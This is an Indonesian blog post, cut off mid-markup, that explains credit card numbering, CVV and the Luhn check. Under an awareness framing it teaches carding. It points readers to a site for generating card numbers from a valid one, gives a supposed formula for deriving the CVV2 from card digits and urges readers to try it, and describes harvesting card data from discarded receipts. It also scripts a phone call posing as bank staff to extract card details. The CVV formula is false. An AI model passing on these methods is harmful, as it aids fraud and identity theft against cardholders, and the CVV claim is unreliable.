style="font-size:100%;">Berikut ini beberapa hal lain yang Anda juga perlu tahu lebih banyak mengenai seluk beluk kartu kredit, aspek keamanannya, dan modus operandi atau prosedur yang biasa dilakukan para carder dalam melaksanakan aksinya. Simak saja baik-baik dan mohon supaya informasi ini tidak disalahgunakan. Bagi para pemilik toko online, para penegak hukum, dan para webmaster, hendaknya tulisan ini bermanfaat untuk sekedar menambah wawasan dan juga meningkatkan kewaspadaan Anda semua.</span><br /><br /><span style="font-size:100%;">SEKELUMIT TENTANG KARTU KREDIT</span><br /><br /><span style="font-size:100%;">Bermula dari tahun 1920-an di Amerika mulai digunakan sebuah kartu untuk melayani pembelian bensin. Konsep pemakaian kartu sebagai salah satu sarana bertransaksi telah dikenal sejak lama. Pada era tahun 1970-an mulailah lahir mesin-mesin ATM sebagai penanda lahirnya pemakaian teknologi informasi dalam hal transaksi perbankan. Sejak itu pula teknologi sebagai asal muasal kartu kredit mulai lahir. Berikut perkembangannya:</span><br /><span style="font-size:100%;">- Tahun 1924. Konsep pemakaian kartu untuk transaksi perbankan mulai diterapkan oleh 100 buah bank di seluruh dunia.</span><br /><span style="font-size:100%;">- Tahun 1938. Beberapa perusahaan mulai bisa menggunakan antar kartu.</span><br /><span style="font-size:100%;">- Tahun 1950. Konsep penggunaan kartu sebagai alat pembayaran ditemukan oleh Frank X. Mc Namara. Pada tahun yang sama lahirlah kartu plastik pertama, yaitu Dinners Club yang selanjutnya diikuti oleh American Express.</span><br /><span style="font-size:100%;">- Tahun 1958. Bank of America mengeluarkan BankAmericard. AMEX mulai merambah pasar entertainment dan travel dalam hal penggunaan kartu.</span><br /><span style="font-size:100%;">- Tahun 1966. Bank of America menawarkan lisensi kartu America Bank untuk membuat kartu pembayaran kepada bank-bank lainnya. Pada tahun yang sama pula lahirlah Master Card.</span><br /><span style="font-size:100%;">- Tahun 1969. ATM pertama lahir di Inggris.</span><br /><span style="font-size:100%;">- Tahun 1970. Konsep mengenai kartu kredit diterima secara luas.</span><br /><span style="font-size:100%;">- Tahun 1977. Lahirlah VISA.</span><br /><span style="font-size:100%;">- Tahun 1995. Transaksi perbankan Amerika menggunakan sarana elektronik mencapai lebih dari 90%.</span><br /><br /><span style="font-size:100%;">Siapa sih, yang tidak kenal dengan kartu kredit. Kata orang, itu punyanya orang-orang kaya, kalau belanja bisa ngutang, jadi bayarnya belakangan. Tapi sekarang kartu kredit bukan hanya monopoli orang-orang kaya saja, dulu sih memang. Anak-anak muda sekarang sudah banyak yang mengantongi kartu kredit di dompetnya.</span><br /><span style="font-size:100%;">Informasi yang diincar oleh para carder (pemalsu maupun pencuri data kartu kredit) adalah 16 digit nomor yang tertera pada bagian depan kartu kredit tersebut. Dari logonya biasanya akan dapat diketahui jenis kartu kredit misalnya saja visa dan master card yang memiliki lambang logo yang tertera pada bagian depan kartu. Ada juga beberapa jenis kartu kredit sekarang ini menggunakan chip dan juga logo di belakang kartu tersebut.</span><br /><span style="font-size:100%;">Informasi penting lainnya adalah Expiration date, yaitu tanggal berakhirnya sebuah kartu kredit. Terdapat beberapa informasi tambahan lainnya, seperti nama pemilik kartu, bank penerbit kartu, serta bulan dan tahun terbit. Seiring dengan meningkatnya sistem keamanan online maka kartu kredit juga dibekali kode atau angka rahasia, yang biasanya dimasukkan saat transaksi. Secara fisik, angka itu terdapat pada bagian belakang kartu kredit.</span><br /><br /><span style="font-size:100%;">MENGENAL KODE RAHASIA.</span><br /><span style="font-size:100%;">Tiga digit angka yang terdapat di belakang kartu kredit adalah nomor otorisasi manual untuk kartu kredit supaya bisa melakukan transaksi. Tiga digit angka tersebut dikenal dengan istilah CVV (Cardholder Verification Value), ada juga yang menyebutnya CSC (Card Security Code), pada beberapa kasus ada pula yang menyebut CVV dengan CVN (Card Verification Number). Istilah CVV lebih sering digunakan ketimbang CSC maupun CVN.</span><br /><span style="font-size:100%;">CVV ini, terutama sering digunakan untuk transaksi yang tidak menggunakan kartu kredit secara fisik, seperti berbelanja lewat internet. Dengan adanya CVV ini berguna untuk mencegah orang yang tidak berhak dalam melakukan transaksi yang menggunakan kartu kredit.</span><br /><span style="font-size:100%;">Istilah untuk kode rahasia tersebut akan berbeda-beda untuk setiap jenis kartu. Untuk jenis kartu Visa dan Diners Club menyebutnya CVV2, MasterCard menyebutnya CVC2. Khusus untuk Amex atau American Express menyebutnya CID (Card Identification Number). Pada Amex, CVV-nya adalah 4 digit, yang terdapat pada bagian depan kartu kredit.</span><br /><span style="font-size:100%;">Sedangkan untuk proses transaksi langsung pada toko-toko konvensional, kode tersebut bisa dilihat langsung oleh kasir. Kadang-kadang mereka juga melihat tanda tangan. Sebab kartu kredit tidak akan berlaku jika tidak ditandatangani pada bagian belakangnya. Karena tanda tangan itu adalah sebagai otorisasinya. Jadi, boleh dibilang CVV berguna sebagai pengganti tanda tangan.</span><br /><br /><span style="font-size:100%;">ALGORITMA CEK DIGIT LUHN.</span><br /><span style="font-size:100%;">Saya tidak akan berpanjang lebar pada bagian ini. Saya memasukkan hal ini hanya sebagai tambahan yang perlu diketahui. Setiap kali melakukan transaksi menggunakan kartu kredit ada suatu proses yang disebut sebagai authentication yaitu sebuah proses untuk memastikan bahwa nomor kartu kredit yang dimasukkan adalah benar.</span><br /><span style="font-size:100%;">Proses transaksi dimulai dimana pihak merchant menggesekkan kartu kredit dan dihubungkan ke server bank untuk diperiksa. Untuk menghindari adanya kesalahan maka kartu kredit dirancang sehingga memungkinkan dilakukannya pengecekan awal, sebelum sebuah kartu diperiksa. Pengecekan ini adalah pengecekan digit atau disebut juga algoritma cek digit.</span><br /><span style="font-size:100%;">Algoritma cek digit pada kartu kredit disebut sebagai cek digit Luhn.</span><br /><span style="font-size:100%;">Algoritma cek digit ini sudah banyak digunakan oleh bank-bank besar yang mengeluarkan kartu kredit. Pada dasarnya, metode yang digunakan cukup sederhana. Misalnya, kartu kredit yang terdapat 16 digit angka. Proses pengecekannya adalah:</span><br /><span style="font-size:100%;">1. Digit yang berada di posisi ganjil (dihitung mulai dari digit paling kiri) yang berarti digit pertama. Nilainya dikalikan dengan dua; jika hasilnya lebih besar dari 9 maka kurangi hasilnya dengan 9, kemudian jumlahkan semua angka yang diperoleh.</span><br /><span style="font-size:100%;">2. Jumlahkan semua digit yang berada di posisi genap.</span><br /><span style="font-size:100%;">3. Jumlahkan hasil prosedur nomor 1 dengan nomor 2 di atas. Apabila hasilnya habis dibagi 10, berarti nomor kartu tersebut sah.</span><br /><span style="font-size:100%;">Sedangkan apabila kartu kreditnya terdapat digit ganjil (misalnya 13 atau 15), caranya sama saja. Perbedaannya hanya pada langkah nomor 1 yang dikalikan adalah digit pada posisi genap, dan pada langkah nomor 2 yang dijumlahkan adalah digit posisi ganjil.</span><br /><span style="font-size:100%;">Sebagai contoh:</span><br /><span style="font-size:100%;">Kartu kredit dengan nomor 9876-5432-1012-3456. Saya ingin mengetahui apakah nomor kartu kredit tersebut sah atau tidak.</span><br /><span style="font-size:100%;">Diketahui: ada 16 digit (genap).</span><br /><span style="font-size:100%;">1. Kalikan semua angka pada digit ganjil dengan dua lalu kurangi hasilnya dengan 9 (jika hasilnya lebih dari 9), kemudian jumlahkan.</span><br /><span style="font-size:100%;">Digit ke-1: 9 9x2 = 18 (lebih dari 9) 18-9 = 9</span><br /><span style="font-size:100%;">Digit ke-3: 7 7x2 = 14 (lebih dari 9) 14-9 = 5</span><br /><span style="font-size:100%;">Digit ke-5: 5 5x2 = 10 (lebih dari 9) 10-9 = 1</span><br /><span style="font-size:100%;">Digit ke-7: 3 3x2 = 6 ; 6 (tetap; kurang dari 9)</span><br /><span style="font-size:100%;">Digit ke-9: 1 1x2 = 2 ; 2 (tetap; kurang dari 9)</span><br /><span style="font-size:100%;">Digit ke-11: 1 1x2 = 2 ; 2 (tetap; kurang dari 9)</span><br /><span style="font-size:100%;">Digit ke-13: 3 3x2 = 6 ; 6 (tetap; kurang dari 9)</span><br /><span style="font-size:100%;">Digit ke-15: 5 5x2 = 10 (lebih dari 9) 10-9 = 1</span><br /><span style="font-size:100%;">Jumlahkan: 9 5 1 6 2 2 6 1 = 32</span><br /><span style="font-size:100%;">2. Jumlahkan digit yang ada di posisi genap.</span><br /><span style="font-size:100%;">Digit ke-2: 8</span><br /><span style="font-size:100%;">Digit ke-4: 6</span><br /><span style="font-size:100%;">Digit ke-6: 4</span><br /><span style="font-size:100%;">Digit ke-8: 2</span><br /><span style="font-size:100%;">Digit ke-10: 0</span><br /><span style="font-size:100%;">Digit ke-12: 2</span><br /><span style="font-size:100%;">Digit ke-14: 4</span><br /><span style="font-size:100%;">Digit ke-16: 6</span><br /><span style="font-size:100%;">Jumlah : 32</span><br /><span style="font-size:100%;">3. Tambahkan dengan hasil nomor 1 ditambah nomor 2.</span><br /><span style="font-size:100%;">32 32 = 64</span><br /><span style="font-size:100%;">Karena 64 tidak habis dibagi 10 maka nomor tersebut tidak sah sebagai nomor kartu kredit.</span><br /><span style="font-size:100%;">Nah, dari teknik seperti inilah banyak diterapkan untuk membuat program pembuat dan pengecek kartu kredit. Tapi, banyak hasil nomor kartu kredit dari program tersebut tidak bisa digunakan begitu saja. Karena pemeriksaan yang jauh lebih ketat. Misalnya, perlunya nama pemilik dan tanggal berakhir (expiration date).</span><br /><span style="font-size:100%;">Secara umum, jika dikelompokkan maka diketahui prefix kartu kredita adalah:</span><br /><span style="font-size:100%;">4xxx VISA</span><br /><span style="font-size:100%;">5xxx MASTERCARD</span><br /><span style="font-size:100%;">6xxx DISCOVER</span><br /><span style="font-size:100%;">37xx AMERICAN EXPRESS</span><br /><br /><span style="font-size:100%;">Prefix adalah digit awal pada kartu kredit. Sebagai bekal bagi Anda, berikut saya tampilkan tabel prefix beberapa kartu kredit. Sebelumnya saya jelaskan dulu. Sebelum saya suguhkan tabel, sebaiknya Anda baca sedikit informasi tambahan, untuk memperjelas tabelnya.</span><br /><span style="font-size:100%;">- Sejak 8 November 2004, Mastercard membeli BIN Range milik Diner's Club untuk kawasan Amerika. BIN Range Diner's Club Internasional dimulai dengan 38, sedangkan BIN Range 36 menjadi milik MasterCard.</span><br /><span style="font-size:100%;">- Sejak 1 Oktober 2005, Discover Bank menyertakan BIN yang baru yaitu 650000-650999</span><br /><br /><span style="font-size:100%;">Tabel Prefix Beberapa Kartu Kredit.</span><br /><span style="font-size:100%;">PREFIX PANJANG NOMOR JENIS KARTU</span><br /><span style="font-size:100%;">1800 15 JCB</span><br /><span style="font-size:100%;">2131 15 JCB</span><br /><span style="font-size:100%;">300 14 Diner's Club</span><br /><span style="font-size:100%;">301 14 Diner's Club</span><br /><span style="font-size:100%;">302 14 Diner's Club</span><br /><span style="font-size:100%;">303 14 Diner's Club</span><br /><span style="font-size:100%;">304 14 Diner's Club</span><br /><span style="font-size:100%;">305 14 Diner's Club</span><br /><span style="font-size:100%;">34 15 American Express</span><br /><span style="font-size:100%;">36 14/16 MasterCard</span><br /><span style="font-size:100%;">37 15 American Express</span><br /><span style="font-size:100%;">38 14 Diner's Club</span><br /><span style="font-size:100%;">3 16 JCB</span><br /><span style="font-size:100%;">4 13/16 Visa</span><br /><span style="font-size:100%;">51 14/16 MasterCard</span><br /><span style="font-size:100%;">52 14/16 MasterCard</span><br /><span style="font-size:100%;">53 14/16 MasterCard</span><br /><span style="font-size:100%;">54 14/16 MasterCard</span><br /><span style="font-size:100%;">55 14/16 MasterCard</span><br /><span style="font-size:100%;">56 14/16 Bank Card</span><br /><span style="font-size:100%;">6011 16 Discover Card</span><br /><span style="font-size:100%;">6500-6509** 16 Discover Card</span><br /><span style="font-size:100%;">6013 16 Discover Card</span><br /><span style="font-size:100%;">560 16 Bank Card</span><br /><span style="font-size:100%;">561 16 Bank Card</span><br /><br /><span style="font-size:100%;">BIN (Bank Identification Number) merupakan 6 digit awal nomor kartu kredit. Boleh dibilang untuk menunjukkan institusi yang mengeluarkan kartu tersebut pada konsumen atau card holder.</span><br /><span style="font-size:100%;">Dari apa yang telah saya jelaskan mengenai prefix dan algoritma Luhn, saya akan memaparkan sedikit mengenai algoritma spesifik pada kartu American Express.</span><br /><span style="font-size:100%;">- 4 digit pertama, menunjukkan: kode negara, kode mata uang, dan jenis kartu (Charge atau Credit Card).</span><br /><span style="font-size:100%;">- 2 digit berikutnya, menunjukkan: tipe kartu apakah Gold atau Platinum.</span><br /><span style="font-size:100%;">- 1 digit berikutnya merupakan Billing Cycle.</span><br /><span style="font-size:100%;">- 4 digit berikutnya lagi merupakan nomor account.</span><br /><span style="font-size:100%;">- 4 digit berikutnya (setelah sebelum-sebelumnya) menunjukkan nomor terbitan kartu (card issue) yang mulai dari angka 1, dan akan terus naik, apabila terjadi pergantian kartu baik karena hilang atau dicuri.</span><br /><span style="font-size:100%;">- 2 digit berikutnya lagi, card issue, di bawah account. Contohnya, jika ada pemegang kartu tambahan, diawali dengan 00 dan akan terus naik.</span><br /><span style="font-size:100%;">- Digit terakhir merupakan cek digit Luhn (digunakan untuk verifikasi).</span><br /><br /><span style="font-size:100%;">CREDIT CARD GENERATOR</span><br /><span style="font-size:100%;">Berhubung saya sempat menyinggung persoalan generator nomor kartu kredit, maka saya akan menjelaskan beberapa hal. Program generator nomor kartu kredit tersebut lebih dikenal dengan sebutan CC thred. Supaya lebih enak, saya lebih menyukai menyebutnya CC Generator. Terkadang dalam kegiatan carding, para pelakunya tidak hanya melakukan pencarian melalui internet, bisa saja dengan memanfaatkan CC Generator untuk mendapatkan nomor yang baru.</span><br /><span style="font-size:100%;">Ada banyak program CC Generator yang beredar. Hal ini bisa terjadi karena konsep kerja CC Generator tersebut adalah menghasilkan nomor-nomor fiktif. Dimana nomor yang dihasilkan bukanlah sederetan nomor sembarangan. Melainkan, hasil perhitungan berdasarkan algoritma.</span><br /><span style="font-size:100%;">Terkadang nomor yang dihasilkan oleh CC Generator tersebut gagal digunakan saat transaksi. Hal ini bisa terjadi, sebab saat ini kebanyakan merchant baik juga toko online, tidak hanya melakukan pengecekan berdasarkan algoritma nomor kartu kredit saja. Ada banyak hal lainnya, seperti tanggal berakhir, nama pemilik, nomor CVV dan sebagainya.</span><br /><span style="font-size:100%;">Selain itu kemungkinan pula CC Generator tersebut akan menghasilkan nomor yang sudah tidak aktif lagi. Katakanlah sudah pernah keluar dulunya dan sekarang nomor tersebut sudah mati.</span><br /><span style="font-size:100%;">Sebenarnya, saya tidak begitu suka membahas tentang CC Generator ini. Lagi pula saya lebih suka aktivitas tanpa tools. Jadi, Anda pun bisa mencoba menggunakan generator kartu kredit hanya bermodalkan sebuah browser.</span><br /><span style="font-size:100%;">Caranya adalah dengan masuk ke situs berikut:</span><br /><br /><span style="font-size:100%;">http://www.elfqrin.com/hacklab/pages/discard.php</span><br /><br /><span style="font-size:100%;">Pada tampilan paling atas pada situs tersebut, Anda bisa melakukan validitas mengenai sebuah nomor kartu kredit.</span><br /><span style="font-size:100%;">Untuk men-generate sebuah nomor kartu kredit, pertama-tama, tentukan jenis kartu kredit yang akan digenerate tersebut. Kemudian masukkanlah nomor kartu kredit yang valid. Validitas sebuah kartu kredit bisa Anda coba seperti di atas.</span><br /><span style="font-size:100%;">Misalnya, nomor yang valid tersebut adalah:</span><br /><span style="font-size:100%;">1234567890124567</span><br /><span style="font-size:100%;">Gantilah salah satu angka menjadi huruf x.</span><br /><span style="font-size:100%;">Misalnya, 1234 5678 9012 45xx, atau 1234 xxxx xxxx xxxx. Banyaknya huruf x terserah kepada Anda. Hal ini bertujuan supaya program tersebut mengubah huruf x tersebut menjadi angka yang sesuai. Begitu gampang bukan.</span><br /><br /><span style="font-size:100%;">MENGAKALI CVV.</span><br /><span style="font-size:100%;">Pada bagian sebelumnya, Anda sudah bermain-main dengan angka-angka atau nomor kartu kredit itu sendiri. Sekarang saatnya mempermainkan angka-angka atau nomor CVV. Berikut ini akan saya jelaskan mengenai bagaimana cara yang digunakan oleh para carder untuk mengetahui CVV dari sebuah nomor kartu kredit. Hal ini sangat penting sekali, sebab peranan CVV sangatlah besar berhubungan dengan kartu kredit. Sebelum itu, saya ingin menunjukkan sebuah tools yang bernama Crack CVV2. Tools ini dibuat oleh J4mbi H4ck3r.</span><br /><span style="font-size:100%;">Misalnya saja nomor yang diisikan pada software tool crack CVV2 adalah 5444605876165920. Nomor tersebut hanyalah contoh. Dengan menekan tombol Generated maka akan muncul nilai CVV2 yang dicari. Nilai CVV2nya adalah 865.</span><br /><span style="font-size:100%;">Sudah saya katakan, kebanyakan dari tools sejenis memberikan nomor CVV yang tidak akurat. Setelah saya bandingkan hasil generate dari tool crack CVV2 tersebut dengan CVV yang asli dari kartu kredit yang saya contohkan tadi, ternyata nomor CVVnya berbeda. Walau demikian, nomor-nomor tersebut yang "tidak tepat", tetapi ternyata masih bisa diterima sebagai validasi. Hal ini saya coba dengan melakukan validitas sebuah kartu kredit yang caranya telah saya jelaskan di bagian awal tadi.</span><br /><span style="font-size:100%;">Untuk menunjukkan ketidakvalidan, nomor CVV tersebut, sekarang saya mencoba untuk mengganti dua digit terakhir dari nomor di atas menjadi 5444605876165925. Nomor CVV2 yang dihasilkan tetaplah sama 865. Berhubung walau salah seperti itu, tetapi masih tetap dapat diterima oleh situs di internet. Saya akan menunjukkan cara kerjanya.</span><br /><span style="font-size:100%;">Alasan saya mengapa saya memilih tools tersebut sebagai contoh. Hal ini karena metode atau cara kerja yang akan saya jelaskan adalah sama. Hanya saja di sini saya menggunakannya berdasarkan rumus, bukan sebuah program.</span><br /><span style="font-size:100%;">Cara kerja yang pertama, bagaimana cara mengetahui bahwa jenis kartu tersebut adalah MasterCard (MasterC pada gambar).</span><br /><span style="font-size:100%;">"Ya, iyalah. Bisa ditebak."</span><br /><span style="font-size:100%;">Kan sebelumnya, Anda sudah mengetahui mengenai prefix. Nomor yang diawali dengan angka 5 adalah MasterCard. Dan nomor yang diawali dengan angka 4 adalah Visa. Gampang bukan.</span><br /><span style="font-size:100%;">Sekarang cara untuk mengetahui nomor CVV2. Rumusnya adalah:</span><br /><span style="font-size:100%;">Digit ke-8 Digit ke-12 (Digit ke-3 1)</span><br /><span style="font-size:100%;">Dari nomor 5444605876165920</span><br /><span style="font-size:100%;">Digit ke-8 adalah 8</span><br /><span style="font-size:100%;">Digit ke-12 adalah 6</span><br /><span style="font-size:100%;">Digit ke-3 adalah 4 1 = 5</span><br /><span style="font-size:100%;">Maka CVV2-nya adalah 865</span><br /><span style="font-size:100%;">Dari rumus tersebut terjawab sudah; mengapa pada saat dua digit terakhir diganti nomor CVV2 tidak berubah. Hal ini karena dalam rumus hanya menghitung digit ke-8, ke-12, dan digit ke-13. Sedangkan digit ke-15 dan digit ke-16 tidak tersentuh.</span><br /><span style="font-size:100%;">Dibandingkan dengan tools di atas yang hanya menggunakan satu rumus saja. Sebagai tambahan, apabila menggunakan rumus di atas, CVV-nya ditolak. Anda masih dapat mencoba menggunakan rumus berikut: Digit ke-7 Digit ke-13 (Digit ke-3 1)</span><br /><span style="font-size:100%;">Cara perhitungannya tetaplah sama. Siapa tahu berhasil.</span><br /><span style="font-size:100%;">Ingat, metode tersebut hanyalah sebuah metode. Jujur saja, saya sendiri tidak tahu rumus maupun algoritma yang benar-benar digunakan oleh lembaga finansial. Namun, setidaknya metode di atas adalah salah satu metode yang digunakan oleh para carder.</span><br /><span style="font-size:100%;">Buktinya, walaupun tidak sesuai dengan nomor CVV yang asli (saya coba menggunakan kartu kredit yang asli). Saat melakukan validitas di internet tetap dapat diterima. Walaupun rumus tersebut tidak tepat 100% masih banyak saja toko online di internet yang mau menerima. Jadi, walaupun "salah-salah" begitu, masih bisa digunakan.</span><br /><span style="font-size:100%;">Sekali lagi ingat, kedua rumus tersebut tidak menjami kevalidan CVV sebuah kartu kredit. Walau demikian, masih tetap layak untuk dicoba. Iseng-iseng berhadiah.</span><br /><br /><span style="font-size:100%;">KONVENSIONAL CARDING.</span><br /><span style="font-size:100%;">Saya akan memulai dengan teknik paling gampang yang dilakukan seorang carder. Konvensional carding...Apalagi ini?</span><br /><span style="font-size:100%;">Konvensional carding adalah teknik melakukan carding tanpa menggunakan komputer apalagi koneksi internet dan tools. Hanya bermodalkan mengais tong sampah, seseorang bisa menjadi carder yang berbahaya. Seseorang bisa menjadi carder tanpa harus memahami dunia internet sedikit pun. Ah,masa sih? Enak banget, tidak perlu modal...</span><br /><span style="font-size:100%;">Iya bener. Terkadang banyak kertas-kertas yang berserakan bisa menjadi lahan bagi para carder. Supaya lebih jelas, Anda ikuti saja penjelasannya.</span><br /><span style="font-size:100%;">Hampir sama dengan Social Engineering, konvensional carding adalah dengan memanfaatkan kelalaian manusia. Serta kejorokan seorang carder yang suka mengais-ngais tong sampah.</span><br /><span style="font-size:100%;">Iya sebenarnya, hanyalah trik saya untuk menakut-nakuti saja, supaya tidak banyak yang menjalankan konvensional carding, karena hal ini sangat mudah dilakukan oleh siapapun.</span><br /><span style="font-size:100%;">Anda bisa saja mendapatkan informasi kartu kredit tidak hanya dari tong sampah. Bahkan struk belanja dari supermarket pun yang biasa dibuang sembarangan bisa juga bermanfaat untuk melancarkan teknik konvensional carding ini.</span><br /><span style="font-size:100%;">Dari struk belanja di supermarket (yang menggunakan pembayaran kartu kredit), Anda bisa mengetahui 3 hal berikut:</span><br /><span style="font-size:100%;">1. Jenis kartu (misalnya: VISA)</span><br /><span style="font-size:100%;">2. Nama pemilik kartu kredit tersebut.</span><br /><span style="font-size:100%;">3. Reference menunjukkan nomor kartu kredit.</span><br /><span style="font-size:100%;">Apakah Anda mengira informasi itu hanya bersumber dari struk belanja saja? Anda salah. Pada saat seseorang berbelanja menggunakan kartu kredit maka pemilik kartu tersebut akan menerima sebuah struk bank (yang pertama dari toko), bukti pembelanjaan menggunakan kartu kredit. Lihat, ada beberapa bukti pembelanjaan yang menggunakan kartu kredit. Di sana akan selalu tertera jenis kartu apakah Visa, Amex (American Express), dan sebagainya. Juga terdapat tanggal transaksi, nama pemilik kartu, beserta nomor kartu kreditnya. Pada beberapa kasus ada yang ditandatangani.</span><br /><span style="font-size:100%;">Wahai para pemilik kartu kredit, sadarkah Anda dengan kebiasaan Anda yang membuang sembarangan bukti pembelanjaan dengan kartu kredit suatu saat bisa merugikan Anda sendiri, maka waspadalah!</span><br /><span style="font-size:100%;">Berhubungan dengan bukti pembelanjaan, bagi para carder yang suka mengais tong sampah, harap sedikit teliti. Sebab ada juga struk belanja yang merupakan kartu debit (misalnya struk pembelanjaan dengan kartu debit BCA), dan bukannya kartu kredit. Hal ini bisa diketahui dengan melihat jenis kartunya. Supaya lebih jelas, ciri struk belanja yang menggunakan kartu debit, selalu mencantumkan tulisan DEBIT diiringi dengan nomor tipe kartu dalam tulisan yang besar-besar pada bukti struk belanja, sementara pada struk belanja yang menggunakan kartu kredit selalu tertulis di pojok kiri atas tulisan VISA (atau jenis kartu kredit lainnya seperti, AMEX, dsb) yang diikuti dengan nomor tipe kartu.</span><br /><span style="font-size:100%;">Apakah untuk melakukan konvensional carding, hanya bersumber dari struk belanja saja, pada dasarnya masih banyak sumber lainnya yang sering diabaikan oleh kebanyakan orang. Misalnya, di sini apabila seseorang yang baru saja menerima aplikasi kartu kredit, pada surat pengantarnya akan selalu ditampilkan nomor kartu kreditnya.</span><br /><span style="font-size:100%;">Ternyata, sejauh ini konvensional carding lebih mudah dan tidak perlu bermodal apa-apa. Apalagi tidak harus mempelajari bahasa pemrograman, atau memahami sistem keamanan komputer atau internet. Mudah bukan?</span><br /><span style="font-size:100%;">Biasanya, setiap bulan, para pemilik kartu kredit akan menerima billing tagihan. Di sana juga selalu ditampilkan data kartu kredit tersebut. Biasanya, setelah menerima billing tagihan, maka pemilik kartu kredit akan melakukan pembayaran. Salah satu sarana pembayaran adalah melalui ATM. Kesalahan yang sering dilakukan oleh orang-orang adalah membuang billing tagihan dan juga struk pembayaran setelah melakukan pembayaran tersebut. Sungguh suatu tindakan ceroboh yang membahayakan diri Anda sendiri.</span><br /><br /><span style="font-size:100%;">SEKEDAR TIPS.</span><br /><span style="font-size:100%;">Wahai pengguna kartu kredit, janganlah Anda membuang sembarangan kertas apapun yang tertera pada nomor kartu kredit Anda, seperti struk belanja dan sebagainya. Sebisa mungkin, potonglah sekecil mungkin sebelum Anda membuangnya. Anda bisa menggunakan tangan, gunting dan sebagainya. Khusus untuk korporasi, saya menyarankan untuk menggunakan Paper Shredder. Alat tersebut berguna untuk memotong kertas-kertas yang Anda miliki, baru dibuang. Atau lebih baik lagi, bila kertas-kertas tersebut dibakar hingga menjadi abu, sehingga Anda tidak perlu khawatir lagi.</span><br /><br /><span style="font-size:100%;">SOCIAL ENGINEERING.</span><br /><span style="font-size:100%;">Tentunya Anda sudah tahu dan sering mendengar kata-kata Social Engineering. Berikut ini langsung saya berikan sebuah contoh berupa percakapan seorang operator telepon card center ataupun customer service bank. Teknik ini pulalah yang sering ditiru oleh para carder. Selain dari bank banyak pula yang mengaku dari petugas bank bagian/departemen lainnya, konsultan keuangan, pihak penjamin kartu kredit, bagian asuransi kartu kredit, atau yang sejenis dengan itu. Biar gampang, terlebih dahulu saya buatkan sebuah ilustrasi sederhana. Katakanlah sang korban bernama Victim. Dia menerima sebuah telepon dari seseorang yang bersuara ramah, dan mengaku sebagai customer service tempat bank kartu kredit milik si Victim. Biasanya sih, mereka bersuara wanita dengan nada yang halus dan ramah serta beralasan untuk melakukan survei. Selanjutnya saya menyebut Customer Service itu sebagai Fiktif CS. Terjadilah percakapan diantara mereka.</span><br /><span style="font-size:100%;">Fiktif CS: "Halo, selamat siang. Bisa bicara dengan Bapak Victim?"</span><br /><span style="font-size:100%;">Victim: "Iya, saya sendiri. Ada yang bisa saya bantu?"</span><br /><span style="font-size:100%;">Fiktif CS: "Bapak Victim, kami dari Card Center, Bank Antah Berantah, ingin melakukan survei mengenai kartu kredit Bapak. Sebab kami akan melakukan kenaikan limit untuk kartu kredit yang Bapak miliki saat ini."</span><br /><br /><span style="font-size:100%;">Time Out: "Bentuk modus operandi lainnya bisa beragam seperti: Perubahan sistem pada bank, menawarkan bonus/hadiah, mendata ulang customer, memastikan transaksi yang dilakukan sebelumnya, mengupgrade kartu menjadi Gold/Platinum, atau modus lainnya yang dibuat oleh para carder. Selain itu metode seperti ini sering dilakukan dengan metode tembak langsung seperti contoh di atas."</span><br /><br /><span style="font-size:100%;">Victim: "O, iya silahkan."</span><br /><span style="font-size:100%;">Fiktif CS: "Tagihan Bapak Victim dialamatkan kemana?"</span><br /><span style="font-size:100%;">Victim: "Jl. Kesasar, Gang Buntu No. 001, Jakarta."</span><br /><span style="font-size:100%;">Fiktif CS: "Alamat tinggal Bapak Victim saat ini dimana?"</span><br /><span style="font-size:100%;">Victim: "Jl. Sumber Rejeki 111, Depok."</span><br /><span style="font-size:100%;">Fiktif CS: "Tanggal lahir Bapak?"</span><br /><span style="font-size:100%;">Victim: "10 November 1970."</span><br /><span style="font-size:100%;">Fiktif CS: "Maaf Pak, nama ibu kandungnya?"</span><br /><span style="font-size:100%;">Victim: "Mak Nyak."</span><br /><span style="font-size:100%;">Fiktif CS: "Tolong sebutkan 16 digit nomor kartu kredit Bapak?"</span><br /><span style="font-size:100%;">Victim: "Tunggu sebentar ya, saya ambil dulu dari dompet."</span><br /><span style="font-size:100%;">Fiktif CS: "Silahkan."</span><br /><span style="font-size:100%;">Victim: "Halo, ini nomornya 1234 5678 9000 0009."</span><br /><span style="font-size:100%;">Fiktif CS: ""Tolong sebutkan 3 angka terakhir yang terdapat di belakang kartu."</span><br /><span style="font-size:100%;">Victim: "Kalo yang dibelakang, nomornya 321."</span><br /><span style="font-size:100%;">Fiktif CS: "Kartu kredit Bapak berlaku sampai kapan?"</span><br /><span style="font-size:100%;">Victim: "Desember 2010."</span><br /><span style="font-size:100%;">Fiktif CS: "Baik, Pak Victim. Data Anda sudah cukup. Kartu kredit Bapak akan segera kami proses. Terima kasih atas waktunya."</span><br /><span style="font-size:100%;">Victim: "Iya, sama-sama."</span><br /><br /><span style="font-size:100%;">Sepertinya, percakapan di atas terlihat biasa-biasa saja. Dan tidak ada yang mencurigakan. Tapi itulah teknik Social Engineering untuk melakukan Fraud atau penyalahgunaan kartu kredit. Akibatnya, data-data kartu kredit Pak Victim telah dimiliki oleh orang lain.</span><br /><span style="font-size:100%;">Saat billing tagihan datang pada bulan berikutnya, terjadi transaksi yang besar. Padahal Pak Victim tidak pernah melakukan transaksi tersebut. Dari percakapan telepon, limit Pak Victim juga tidak naik. Barulah Pak Victim sadar akan kelalaiannya.</span><br /><span style="font-size:100%;">Dari penjelasan di atas, ternyata melakukan aktivitas carding bisa dilakukan tanpa tools. Cukup bermodalkan nekad, dengan teknik Social Engineering.</span><br /><span style="font-size:100%;">Intinya, social engineering adalah untuk mendapatkan informasi dengan cara melakukan penipuan dengan memanfaatkan kelemahan manusia. Apalagi orang-orang yang gampang percaya pada orang lain.</span><br /><span style="font-size:100%;">Kegiatan carding dengan memanfaatkan social engineering juga sering terjadi pada saat kegiatan chatting. Misalnya, seseorang yang sudah merasa akrab karena sudah sering berhubungan baik melalui chatting dan email, namun belum pernah bertemu secara fisik. Kemudian salah satu pihak, mulai membuka jurusnya dengan berpura-pura minta dibelikan sesuatu pada situs tertentu. Berhubung mereka sudah terlanjur "akrab" dan ingin mencoba membantu, lalu membelikan barang melalui situs tertentu yang bisa saja situs palsu untuk mencuri data.</span><br /><br /><span style="font-size:100%;">Satu lagi...</span><br /><span style="font-size:100%;">Pengertian dan konsep dasar Social Engineering.</span><br /><span style="font-size:100%;">Social engineering adalah sebuah perform psikologis untuk mempengaruhi dan mencoba mengidentifikasi sebuah masalah atau dalam hal ini lawan. Ini adalah seni didalam dunia elektron. Bagaimana hal ini bisa diterapkan didalam hacking?</span><br /><span 